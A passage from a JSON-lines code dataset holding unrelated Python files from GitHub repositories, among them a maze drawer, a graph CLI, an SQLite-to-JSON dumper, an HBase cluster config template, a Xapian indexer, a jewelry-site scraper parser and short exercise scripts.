Maze_Generator as mazegen\r\nfrom PIL import Image, ImageDraw\r\n\r\ndef draw_maze(maze,policy,current_pos):\r\n rows = maze.shape[0]\r\n columns = maze.shape[1]\r\n image = Image.new(mode='RGB',size = (600,600), color=255)\r\n draw = ImageDraw.Draw(image)\r\n start = 0\r\n end = image.height\r\n x_step = int(end/rows)\r\n y_step = int(end/columns)\r\n\r\n #draws maze based on array\r\n for x in range(0,rows):\r\n for y in range(0,columns):\r\n if maze[y,x] == 0: #GUI coordinates are transposed\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'white',outline='black')\r\n if maze[y,x] == 1:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'blue',outline='black')\r\n if maze[y,x] == 2:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'green',outline='black')\r\n if maze[y,x] == 5:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'black',outline='black')\r\n\r\n show_path(policy,current_pos,draw,image)\r\n del draw\r\n image.show()\r\n #image.save('maze.jpeg','JPEG')\r\n\r\n#shows shortest path from current_pos to end\r\ndef show_path(policy,current_pos,draw,image):\r\n x = current_pos[0]\r\n y = current_pos[1]\r\n rows = policy.shape[0]\r\n columns = policy.shape[1]\r\n start = 0\r\n end = image.height\r\n x_step = int(end/rows)\r\n y_step = int(end/columns)\r\n\r\n draw.rectangle([y*y_step,x*x_step,(y+1)*y_step,(x+1)*x_step],\r\n fill = 'yellow',outline='black')\r\n if policy[x,y] == 1:\r\n show_path(policy,(x-1,y),draw,image)\r\n if policy[x,y] == 2:\r\n show_path(policy,(x+1,y),draw,image)\r\n if policy[x,y] == 3:\r\n show_path(policy,(x,y-1),draw,image)\r\n if policy[x,y] == 4:\r\n 
show_path(policy,(x,y+1),draw,image)\r\n","repo_name":"subramanianjayant/RL_Maze_Solver","sub_path":"MazeGUI.py","file_name":"MazeGUI.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42054226674","text":"import click\nfrom src.graph_matrix import GraphMatrix\nfrom typing import List\nimport ast\nfrom src.transitive_closure.transitive_closure import Warshall\nfrom src.directed_acyclic_graph.topological_sorting.topological_sorting import TopologicalSorting\nfrom src.strong_connected_components.strong_connected_components import StrongComponents\nfrom src.minimal_path.dijkstra import Dijkstra\n\n\n@click.command()\n@click.option(\"--num_vertices\", \"-nv\", help=\"Number of vertices in the graph\",\n required=True, type=int)\n@click.option(\"--edges\", \"-e\", help=\"Edges in the graph, in the format\\n\"\n \"'[[vertice1, vertice2, weight],...]' or\\n\"\n \"'[[vertice1, vertice2],...]'\",\n type=str)\n@click.option(\"--do_warshall/--no_do_warshall\", \"-w/-no_w\", default=False)\n@click.option(\"--topological_sorting/--no_topological_sorting\", \"-ts/-no_ts\",\n default=False)\n@click.option(\"--strong_components/--no_strong_components\", \"-sc/-no_sc\",\n default=False)\n@click.option(\"--dijkstra\", \"-d\", help=\"Dijkstra algorithm, needs a beginning \"\n \"vertice\", default=-1)\ndef main(num_vertices, edges, do_warshall, topological_sorting,\n strong_components,\n dijkstra):\n graph = GraphMatrix(num_vertices, digraph=True)\n\n if edges:\n edges = ast.literal_eval(edges)\n graph = add_edges(graph, edges)\n\n _print_graph(graph)\n\n if do_warshall:\n warshall = Warshall(graph)\n print(warshall)\n\n if topological_sorting:\n print(\"Topological Sorting:\")\n temp = TopologicalSorting(graph)\n print(temp.run())\n\n if strong_components:\n print(\"\\nStrong Components:\")\n temp = StrongComponents(graph)\n print(temp)\n\n if dijkstra >= 0:\n vertice = dijkstra\n str_dijkstra(graph, vertice)\n\n\ndef str_dijkstra(graph: GraphMatrix, start_vertice: int) -> None:\n dijkstra = Dijkstra(graph)\n result = dijkstra.run(start_vertice)\n print(f\"\\nDijkstra from {start_vertice}:\")\n print(\"vertice, cost, path\")\n for vertice in result:\n cost, path = result[vertice]\n print(f\"{vertice}, {cost}, {path}\")\n\n\ndef add_edges(graph: GraphMatrix, edges_list: List[List[int]]) -> GraphMatrix:\n if len(edges_list[0]) == 3:\n for x, y, z in edges_list:\n graph.add_edge(x, y, weight=z)\n else:\n for x, y in edges_list:\n graph.add_edge(x, y)\n return graph\n\n\ndef _print_graph(graph: GraphMatrix) -> None:\n print(\"Graph:\")\n print(graph)\n print(\"Edge Weight:\")\n print(graph.str_weight())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"renan-cunha/graph_lib","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72160828009","text":"import sqlite3, json, yaml\n\n# queries\nLIST_TABLE_NAMES = \"SELECT tbl_name FROM sqlite_master where type='table' AND tbl_name NOT IN ('sqlite_sequence');\"\n\n# read config\nconfig = {}\nwith open(\"./config.yaml\", \"r\") as stream:\n try:\n config = yaml.safe_load(stream)\n except yaml.YAMLError as error:\n print(error)\n\n\n# connect to sql\nconn = sqlite3.connect(config[\"database\"])\n\ndef exclude_table(tableName, config):\n for pattern in config[\"exclude\"][\"tables\"]:\n if pattern in tableName:\n return 
True\n return False\n\ndef exclude_column(columnName, config):\n for pattern in config[\"exclude\"][\"columns\"]:\n if pattern in columnName:\n return True\n return False\n\n\n# build data object from queries\ndata = {}\ncursor = conn.cursor()\nfor row in cursor.execute(LIST_TABLE_NAMES):\n table = row[0]\n if exclude_table(table, config):\n continue\n records = []\n cursor2 = conn.cursor()\n # print(\"querying \" + table) \n for row2 in cursor2.execute(\"SELECT * FROM \" + table):\n cols = list(map(lambda x: x[0], cursor2.description))\n record = {}\n for i, col in enumerate(cols):\n if not exclude_column(col, config):\n record[col] = row2[i]\n records.append(record)\n data[table] = records\n\n# write data to json\nwith open(config[\"output\"], \"w\") as f:\n f.write(json.dumps(data))\n\n\njoin_queries = []\nwith open(\"./joins.yaml\", \"r\") as stream:\n try:\n join_query = \"\"\n joins = yaml.safe_load(stream)\n tables = []\n cols = []\n for join in joins:\n for side in joins[join]:\n table = next(iter(side))\n tables.append(table)\n cols.append(side[table])\n join_query += \"SELECT * FROM \" + tables[0] + \" INNER JOIN \" + tables[1] + \" ON \" + tables[0] + \".\" + cols[0] + \" = \" + tables[1] + \".\" + cols[1]\n join_queries.append(join_query)\n except yaml.YAMLError as error:\n print(error)\n\nfor query in join_queries:\n cursor4 = conn.cursor()\n # print(query)\n for row in cursor4.execute(query):\n cols = list(map(lambda x: x[0], cursor4.description))\n # print(cols)\n\n\n","repo_name":"harwoodjp/sqlite-to-json","sub_path":"dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39750865645","text":"#!/usr/bin/env python3\nimport rospy\nimport rosparam\nimport h5py\n\nif __name__=='__main__':\n rospy.init_node(\"hdf5_info\")\n param_list = rosparam.get_param(rospy.get_name() + \"/get_hdf5_info\")\n path = param_list[\"hdf5_open_file_path\"]\n h5_file = h5py.File(path, 'r')\n file_count = 0\n for k1 in h5_file:\n file_count += 1\n key_1 = k1\n \n print('data size is ', file_count)\n print('key1: ', key_1)\n for k2 in h5_file[key_1].keys():\n print('key2: ', k2)","repo_name":"tsuchidashinya/denso_common_pkg","sub_path":"hdf5_package/scripts/get_hdf5_info.py","file_name":"get_hdf5_info.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582493738","text":"#1. 
Escribir un programa que guarde en una variable el diccionario {'Euro':'€', 'Dollar':'$', 'Yen':'¥'}, \n# pregunte al usuario por una divisa y muestre su símbolo o un mensaje de aviso si la divisa no está en el diccionario.\ndic ={ \"euro\":\"€\",\n 'dollar':\"$\",\n 'yen': \"¥\"\n}\n\ndivisa =(input(\"ingrese una palabra:\\n \"))\nif divisa in dic:\n print(\"el valor esta en la lista\")\nelse: \n print(\"el valor no esta en la lista\")\n","repo_name":"AitsuYuyu/PT","sub_path":"dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11781152179","text":"from kaitaistruct import KaitaiStream\nfrom compiled.test_cell import TestCell\nfrom compiled.test_col_fixed import TestColFixed\n\nimport time\nimport random\nimport statistics\nimport sys\n\n# https://stackoverflow.com/a/34482761\ndef progressbar(it, prefix=\"\", size=60, file=sys.stdout):\n count = len(it)\n def show(j):\n x = int(size*j/count)\n file.write(\"%s[%s%s] %i/%i\\r\" % (prefix, \"#\"*x, \".\"*(size-x), j, count))\n file.flush()\n show(0)\n for i, item in enumerate(it):\n yield item\n show(i+1)\n file.write(\"\\n\")\n file.flush()\n\nnum_iterations = 64\ntimes = {}\ncases = ['test_cell', 'test_col_fixed']\n\nfor k in cases:\n times[k] = []\n\n# https://www.peterbe.com/plog/how-to-do-performance-micro-benchmarks-in-python\nfor i in progressbar(range(num_iterations), \"Running benchmark: \", 40):\n choice = cases[random.randint(0, 1)]\n k = None\n row_0 = None\n t0 = time.time()\n\n with open('./sample.bin', 'rb') as f:\n if choice == 'test_cell':\n k = TestCell(KaitaiStream(f))\n row_0 = k.table.table_rows[0].entries\n elif choice == 'test_col_fixed':\n k = TestColFixed(KaitaiStream(f))\n row_0_type = k.table.table_rows[0]\n row_0 = [row_0_type.a, row_0_type.b, row_0_type.c, row_0_type.d]\n\n t1 = time.time()\n assert len(k.table.table_rows) == 65536, 'len(k.table.table_rows) = {} must be {}'.format(len(k.table.table_rows), 65536)\n assert row_0 == [0x7a46, 0x86b97d9c, 0.842150092124939, 0.5340359913176319], 'row_0 = {} does not match'.format(row_0)\n times[choice].append((t1 - t0) * 1000)\n\nstats = [\n ('MEDIAN', lambda numbers: statistics.median(numbers)),\n ('MEAN', lambda numbers: statistics.mean(numbers)),\n ('STDEV', lambda numbers: statistics.stdev(numbers)),\n ('1st', lambda numbers: numbers[0]),\n ('MIN', lambda numbers: min(numbers)),\n ('MAX', lambda numbers: max(numbers)),\n]\n\nfor name, numbers in times.items():\n print('FUNCTION: {} [Used {} times]'.format(name, len(numbers)))\n for stat in stats:\n print('\\t{:6} {:=10.4f} ms'.format(stat[0], stat[1](numbers)))\n print('')\n","repo_name":"generalmimon/ks-table-py-benchmark","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17760008053","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n__author__ = 'Andreas Bader'\n__version__ = \"0.01\"\n\n# db_folders -> List of DB Folder (for space check)\n# prerun_once -> list of commands to run local once before ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_once -> list of commands to run local once after ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)\n# prerun -> list of commands to run before ycsb (all vms or local) (without ycsb, sync or space diff or 
poweroff commands!)\n# postrun -> list of commands to run after ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_master -> list of commands to run before ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_master -> list of commands to run after ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_slaves -> list of commands to run before ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_slaves -> list of commands to run after ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_dict -> list of commands to run before ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# postrun_dict -> list of commands to run after ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# check -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (systemctl start xyz oftern returns true even if start failed somehow. Check that here!)\n# check_master -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (only on master(first=ID 0) vm or local))\n# check_slaves -> list of commands to run after prerun (all vms or local) for checking if everything runs correctly (all without master(=ID 0)) vms or local))\n# check_dict -> list of commands to run after prerun for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# include -> which base modules should be imported and added to the dictionary (standard functions that are reusable). Warning: infinite import loop possible!\n# the following variables are possible in prerun_once, postrun_once, prerun, prerun_master, prerun_slaves, check, check_master, check_slaves, postrun, postrun_master, postrun_slaves, prerun_dict, postrun_dict, check_dict, db_args:\n# %%IP%% -> IP of (actual) db vm\n# %%IPgen%% -> IP of (actual) generator vm (on which this script runs)\n# %%IPn%% -> IP of db vm number n (e.g. %%IP2%%)\n# %%IPall%% -> give String with IP of all vms)\n# %%HN%% -> Hostname of (actual) db vm\n# %%HNgen%% -> Hostname of (actual) generator vm (on which this script runs)\n# %%HNn%% -> Hostname of db vm number n (e.g. %%HN2%%)\n# %%HNall%% -> give String with Hostname of all vms)\n# %%SSH%% -> if SSH should be used (set at the beginning)\n# Order of Preruns/Postruns:\n# 1. prerun/postrun/check, 2. prerun_master/postrun_master/check_master, 3. 
preun_skaves/postrun_slaves/check_slaves, 4.prerun_dict/postrun_dict/check_dict\n# General Order:\n# prerun -> check -> ycsb -> postrun\n\n# this configures hbase\n\ndef getDict():\n baseConfig={}\n baseConfig[\"db_folders\"]=[]\n baseConfig[\"prerun_once\"]= []\n baseConfig[\"postrun_once\"]= []\n baseConfig[\"prerun\"] = [\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s|#tsd.storage.hbase.zk_quorum = localhost|tsd.storage.hbase.zk_quorum = %%HN0%%,%%HN1%%,%%HN2%%,%%HN3%%,%%HN4%%|\\\" /etc/opentsdb/opentsdb.conf'\",\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s||\\\\n \\\\n hbase.rootdir\\\\n hdfs://%%HN0%%:54310/hbase\\\\n \\\\n \\\\n hbase.cluster.distributed\\\\n true\\\\n \\\\n \\\\n hbase.zookeeper.quorum\\\\n %%HN0%%,%%HN1%%,%%HN2%%,%%HN3%%,%%HN4%%\\\\n \\\\n \\\\n hbase.zookeeper.property.dataDir\\\\n /home/vagrant/zookeeper\\\\n |g\\\" /home/vagrant/hbase/conf/hbase-site.xml'\",\n \"%%SSH%%sudo -s bash -c 'sed -i \\\"s|localhost|%%HN1%%\\\\n%%HN2%%\\\\n%%HN3%%\\\\n%%HN4%%|\\\" /home/vagrant/hbase/conf/regionservers'\",\n \"%%SSH%%sudo -s bash -c 'echo -e \\\"%%HN1%%\\\\n%%HN2%%\\\" >> /home/vagrant/hbase/conf/backup-masters'\"\n ]\n baseConfig[\"postrun\"]= []\n baseConfig[\"prerun_master\"]= []\n baseConfig[\"postrun_master\"]= []\n baseConfig[\"prerun_slaves\"]= []\n baseConfig[\"postrun_slaves\"]= []\n baseConfig[\"prerun_dict\"]= {}\n baseConfig[\"postrun_dict\"]= {}\n baseConfig[\"check\"]= []\n baseConfig[\"check_master\"]= []\n baseConfig[\"check_slaves\"]= []\n baseConfig[\"check_dict\"]= {}\n baseConfig[\"include\"] = []\n return baseConfig","repo_name":"TSDBBench/Overlord","sub_path":"vagrant_files/generator/files/databases/base/hbase.py","file_name":"hbase.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36243229390","text":"import xapian as xa\nimport os\nimport json\nimport gzip\nimport itertools\nfrom time import time\nimport indexer as idx\nfrom pprint import pprint\n\nroot = os.environ['DATA']\n\ndef datasets():\n path = os.path.join(root, 'usertables_schema')\n suffix = '_schema.json'\n for f in sorted(os.listdir(path)):\n if f.endswith(suffix):\n yield f[:-len(suffix)]\n\ndef get_schema_content(id):\n path = os.path.join(root, 'usertables_schema', '%s_schema.json' % id)\n with open(path, 'rb') as f:\n return f.read()\n\ndef get_data_lines(id, limit=10):\n path = os.path.join(root, 'usertables_data', '%s.json.gz' % id)\n with gzip.open(path, 'r') as f:\n for (i, line) in enumerate(f):\n if limit and i < limit:\n yield line\n else:\n break\n\nif __name__ == '__main__':\n index_data = True\n\n path = os.path.join(root, 'xapian_index')\n db = xa.WritableDatabase(path, xa.DB_CREATE_OR_OPEN)\n indexer = xa.TermGenerator()\n\n total = 0\n for _ in datasets():\n total += 1\n\n start = time()\n for i, id in enumerate(datasets()):\n raw_schema = get_schema_content(id)\n schema = json.loads(raw_schema)\n text = idx.stringify(schema, stemmer=idx.word_stemmer)\n\n doc = xa.Document()\n\n # adding terms from schema\n indexer.set_document(doc)\n indexer.index_text(text, 1,'S')\n\n doc.add_value(0, id)\n doc.add_value(1, raw_schema)\n\n # adding terms from \n if index_data:\n lines = list(get_data_lines(id, limit=1000))\n for line in lines:\n data = json.loads(line)\n text = \" \".join(str(x) for x in data.values())\n indexer.index_text_without_positions(text, 1, 'D')\n doc.add_value(2, \"\\n\".join(x.decode('utf-8') for x in lines))\n \n db.add_document(doc)\n if i and i % 100 == 0:\n 
db.commit()\n print(\"[%d] in %.2f seconds.\" % (i, time() - start))\n\n db.commit()\n","repo_name":"RJMillerLab/opendata-keyword-search","sub_path":"server/build_index.py","file_name":"build_index.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38607612958","text":"import os, sys\r\n\r\nfrom sqlalchemy import Column, ForeignKey, Integer, String, Table\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy.orm import relationship\r\nfrom sqlalchemy import create_engine\r\nfrom datetime import datetime\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\ndb = SQLAlchemy()\r\nBase = declarative_base()\r\n\r\n#Making an API Endpoint (GET Request)\r\n\r\nclass Category(Base):\r\n\t__tablename__ = 'Category'\r\n\tname = db.Column(String(80), nullable = False)\r\n\tid = db.Column(Integer, primary_key = True)\r\n\t#books = relationship('Book', backref='category', lazy=True)\r\n\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\r\n\tdef __repr__(self):\r\n\t\treturn self.name\r\n\r\nassociation_table = Table('association', Base.metadata,\r\n\tdb.Column('book_id', Integer, ForeignKey('Book.id')),\r\n\tdb.Column('form_id', Integer, ForeignKey('Form.id'))\r\n\t)\r\n\r\nclass Book(Base):\r\n\t__tablename__ = 'Book'\r\n\tname = db.Column(String(80), nullable = False, unique=True)\r\n\tid = db.Column(Integer, primary_key = True)\r\n\tauthor = db.Column(String(30))\r\n\tlanguage = db.Column(String(30))\r\n\tcategory_id = db.Column(Integer, ForeignKey('Category.id'), nullable = False)\r\n\tcategory = db.relationship('Category')\r\n\tforms = db.relationship(\"Form\", secondary=association_table, back_populates=\"books\")\r\n\r\n\tdef __repr__(self):\r\n\t\treturn '' % self.name\r\n\r\nclass Form(Base):\r\n\t__tablename__ = 'Form'\r\n\tname = db.Column(String, nullable = False)\r\n\tid = db.Column(Integer, primary_key=True)\r\n\tbooks = db.relationship(\"Book\", secondary=association_table, back_populates=\"forms\")\r\n\r\n\tdef __init__(self, name):\r\n\t\tself.name = name\r\n\r\n\tdef __repr__(self):\r\n\t\treturn self.name\r\n\r\n### insert at end of file ###\r\nengine = create_engine('sqlite:///allbooks.db')\r\nBase.metadata.create_all(engine)","repo_name":"3Cement/MyLibrary-Flask","sub_path":"mylibrary_database.py","file_name":"mylibrary_database.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30263273355","text":"from src.data.scraping.parsers.base import BaseJewelParser, JewelLoader\nfrom src.data.scraping.processors import TakeMax\n\n\nclass SokolovRuJewelLoader(JewelLoader):\n \"\"\"\n Sokolov.ru jewels sometimes possess length property, which is\n considered as height and appended to the list of height property\n values. In this case height denotes the thickness and is usually\n smaller than the length. 
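    (For instance, under the hypothetical parsed height candidates [1.5, 20.0], i.e. thickness and length, TakeMax keeps 20.0, the length.)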
We don't need the thickness value to be\n present in height property, so we choose the length by taking the\n maximum over the list of height values.\n \"\"\"\n height_out = TakeMax()\n\n\nclass SokolovRuJewelParser(BaseJewelParser):\n \"\"\"\n Parser class for sokolov.ru product pages for mining jewel data.\n All these product pages have two common main blocks:\n - A div of .product class with data-list-id=product attribute.\n Contains main product info: title, price, category, images etc.\n - A div with id=props.\n Contains the detailed description of specific jewel properties:\n physical characteristics (metal, probe, gem inserts, weight,\n width, height, etc.), collection, free-form description etc.\n \"\"\"\n loader_cls = SokolovRuJewelLoader\n\n def __init__(self, response):\n super(SokolovRuJewelParser, self).__init__(response)\n # Main product info\n self.product = response.css('.product[data-list-id=product]')\n # Specific product properties\n self.props = response.css('#props')\n\n def parse_image_urls(self):\n \"\"\"\n Get main image url from data-src attribute of the image\n marked with contentUrl itemprop attribute.\n \"\"\"\n urls = self.product.css(\n 'img[itemprop=contentUrl]::attr(data-src)'\n ).get()\n self.loader.add_value('image_urls', urls)\n\n def parse_title(self):\n \"\"\"Get title from h1 data-detail-name attribute\"\"\"\n title = self.product.css('h1::attr(data-detail-name)').get()\n self.loader.add_value('title', title)\n\n def parse_category(self):\n \"\"\"\n Get category from the data-detail-category attribute of the\n main div.product block. This attribute value is organized in\n granular way \"category / sub-category / sub-sub-category / ...\".\n Thus the value is split by slash and the second item is taken,\n if present (since the first item represents too generic name),\n otherwise the default value is returned.\n \"\"\"\n category = self.product.css(\n '.product[data-list-id=product]::attr(data-detail-category)'\n ).get() or 'Ювелирные украшения'\n\n categories = category.split('/')\n category = categories[1] if len(categories) > 1 else categories[0]\n self.loader.add_value('category', category)\n\n def parse_sku(self):\n \"\"\"Get product id from the meta-tag with sku itemprop\"\"\"\n sku = self.product.css('meta[itemprop=sku]::attr(content)').get()\n self.loader.add_value('sku', sku)\n\n def parse_price(self):\n \"\"\"Get price from the meta-tag with price itemprop\"\"\"\n price = self.product.css('meta[itemprop=price]::attr(content)').get()\n self.loader.add_value('price', price)\n\n def parse_currency(self):\n \"\"\"Get currency from the meta-tag with priceCurrency itemprop\"\"\"\n currency = self.product.css(\n 'meta[itemprop=priceCurrency]::attr(content)'\n ).get()\n self.loader.add_value('currency', currency)\n\n def parse_description(self):\n \"\"\"\n There are two types of description provided with sokolov.ru\n products: about the product itself (target one) and about the\n brand (non-relevant). In div#props they are placed in two \"tab\"\n blocks (or in a single one in case only the brand description\n is provided). 
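        (Hypothetically, tab_names might be ['Об украшении', 'О бренде'], the second name being an illustrative guess; only the text under 'Об украшении' is kept.)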
Here, the tab names are extracted and the text\n corresponding to the pure product description tab is returned.\n \"\"\"\n tab_names = self.props.css('.tab-header-item > p::text').getall()\n tab_texts = self.props.css('.props.wrap-text-show > p::text').getall()\n\n description_tab_name = 'Об украшении'\n if description_tab_name in tab_names:\n description = tab_texts[tab_names.index(description_tab_name)]\n self.loader.add_value('description', description)\n\n @staticmethod\n def _list_props(element, name_in_span=True, value_in_span=True):\n \"\"\"\n Iterates over item blocks with names and values in props list\n inside the div#props container and generates (name, value) pairs.\n Each item consists of two divs: one of .name class and another\n one of .val class. These blocks contain names and values of jewel\n properties optionally wrapped with span blocks.\n :param element: scrapy's SelectorList\n The container element of the list of properties.\n :param name_in_span: bool\n Indicator of whether the name is wrapped with a span block.\n :param value_in_span:\n Indicator of whether the value is wrapped with a span block.\n :return:\n Nothing, but (name, value) pairs are generated.\n \"\"\"\n name_selector = '.name > span::text' if name_in_span else '.name::text'\n value_selector = '.val > span::text' if value_in_span else '.val::text'\n\n for prop in element.css('.props-list'):\n name = prop.css(name_selector).get() or ''\n value = prop.css(value_selector).get() or ''\n yield name.strip(), value.strip()\n\n def parse_props_list(self):\n \"\"\"\n Parse the detailed list of all known jewel properties by\n iterating over the list. Since almost all properties are\n concentrated in a single list, it's more convenient to parse\n them in one method by iterating the entire list rather than\n querying the list for each property separately.\n \"\"\"\n for name, value in self._list_props(self.props):\n if name == 'Коллекция':\n self.loader.add_value('collection', value)\n elif name == 'Бренд':\n self.loader.add_value('brand', value)\n elif name == 'Для кого':\n self.loader.add_value('for_whom', value)\n elif name == 'Тип металла':\n self.loader.add_value('metal', value)\n elif name == 'Проба':\n self.loader.add_value('probe', value)\n elif name == 'Примерный вес':\n self.loader.add_value('weight', value.split()[0])\n elif name == 'Ширина':\n self.loader.add_value('width', value.split()[0])\n elif name == 'Высота':\n self.loader.add_value('height', value.split()[0])\n elif name == 'Длина':\n # sokolov.ru jewels sometimes also possess length property,\n # in such case height denotes the thickness and is usually\n # smaller than the length. For our purposes, we need only\n # two dimensions: width and height, and so we consider the\n # length as height in such cases.\n self.loader.add_value('height', value.split()[0])\n\n @staticmethod\n def _compose_gem_description(props):\n \"\"\"\n Composes a sentence-description of a single certain type of gem\n inserts. 
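        (As a preview, a composed description with hypothetical values might read 'фианит, 2, цвет красный, вес 0.10 карат'.)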
The description is a string of the following format\n (square brackets denote optional parts):\n , [, color: ...][, faceting: ...]\n [, form: ...][, quality: /][, weight]\n :param props: dict\n Dictionary of the form gem property name -> property value.\n :return: str, the desired description\n \"\"\"\n gem_desc_parts = [props['Тип'], props['Количество']]\n\n if 'Цвет' in props:\n gem_desc_parts.append(f'цвет {props[\"Цвет\"].lower()}')\n if 'Огранка' in props:\n gem_desc_parts.append(f'огранка {props[\"Огранка\"]}')\n if 'Форма' in props:\n gem_desc_parts.append(f'форма {props[\"Форма\"].lower()}')\n\n if 'Цветность' in props and 'Чистота' in props:\n chromaticity, purity = props['Цветность'], props['Чистота']\n gem_desc_parts.append(f'качество {chromaticity}/{purity}')\n\n if 'Вес' in props:\n gem_desc_parts.append(f'вес {props[\"Вес\"]}')\n\n return ', '.join(gem_desc_parts)\n\n def parse_props_insert(self):\n \"\"\"\n Iterates over the special type of list of properties - the list\n of gem inserts - and composes the comprehensive description of\n all jewel gems by concatenating the sentences-descriptions of\n individual gems.\n \"\"\"\n gem_descs = []\n for insert in self.props.css('.props-insert__item'):\n insert_props = dict(self._list_props(insert, name_in_span=False))\n gem_descs.append(self._compose_gem_description(insert_props))\n\n if gem_descs:\n self.loader.add_value('gems', '. '.join(gem_descs))\n\n def parse_metal(self):\n # `metal` value is parsed in `parse_props_list`\n pass\n\n def parse_probe(self):\n # `probe` value is parsed in `parse_props_list`\n pass\n\n def parse_brand(self):\n # `brand` value is parsed in `parse_props_list`\n pass\n\n def parse(self):\n \"\"\"\n Parses the detailed list of jewel properties (including gem\n inserts) first, and all the rest attributes then.\n \"\"\"\n self.parse_props_list()\n self.parse_props_insert()\n return super(SokolovRuJewelParser, self).parse()\n","repo_name":"IlyaKachan/jewelsim","sub_path":"src/data/scraping/parsers/sokolov_ru.py","file_name":"sokolov_ru.py","file_ext":"py","file_size_in_byte":9833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18093482011","text":"import os\nimport time\n\nimport cv2\nfrom termcolor import colored\n\nfrom DTOs.AnomalyDTO import AnomalyDTO\nfrom DataManagment.CacheManager import get_cache_manager_instance\nfrom Logics.ClassificationLogic import get_classification_logic_instance\n\n\nclass ClassificationService:\n def __init__(self):\n self._cacheManager = get_cache_manager_instance()\n self._classificationLogic = get_classification_logic_instance()\n\n def start_service(self):\n print(colored(\"classification service started on process \" + str(os.getpid()), 'blue', 'on_grey', attrs=['bold']))\n while True:\n toClassifyAnomalyDTO = self._cacheManager.get_oldest_to_classify_anomaly_cache()\n if toClassifyAnomalyDTO is None:\n time.sleep(1)\n continue\n frame = cv2.imread('cache/' + toClassifyAnomalyDTO.image_uri)\n is_anomaly, confidences = self._classificationLogic.is_anomaly_and_confidences(frame)\n self._cacheManager.delete_to_classify_anomaly(toClassifyAnomalyDTO.id)\n if is_anomaly:\n print(colored(\"anomaly detected \" + toClassifyAnomalyDTO.image_uri + \" pothole: \" + str(confidences[0]) + \" bump \" + str(confidences[1])\n + \" manhole \" + str(confidences[2]) + \" roadcrack \" + str(confidences[3]), 'cyan', 'on_grey', attrs=['bold']))\n self._cacheManager.cache_anomaly(AnomalyDTO(0, confidences[0], confidences[1], 
confidences[2],\n confidences[3], toClassifyAnomalyDTO.lat, toClassifyAnomalyDTO.lng,\n toClassifyAnomalyDTO.image_uri, toClassifyAnomalyDTO.created_at))\n else:\n print(\n colored(\"frame isn't a anomaly\" + toClassifyAnomalyDTO.image_uri, 'blue', 'on_grey', attrs=['bold']))\n self._cacheManager.delete_image(toClassifyAnomalyDTO.image_uri)\n","repo_name":"OmarMaysour/RoadEye","sub_path":"Services/ClassificationService.py","file_name":"ClassificationService.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74522036968","text":"import sys\n\nN, M = map(int, sys.stdin.readline().split())\ncardlist = list(map(int, sys.stdin.readline().split()))\nsum = 0\n\nfor i in range(0, N-2):\n for ii in range(i+1, N-1):\n for iii in range(ii+1, N):\n if cardlist[i] + cardlist[ii] + cardlist[iii] > M:\n continue\n else:\n sum = max(sum, cardlist[i] + cardlist[ii] + cardlist[iii])\n\nprint(sum)\n\n\n \n\n","repo_name":"silentcat21/BAEKJOON","sub_path":"브루트 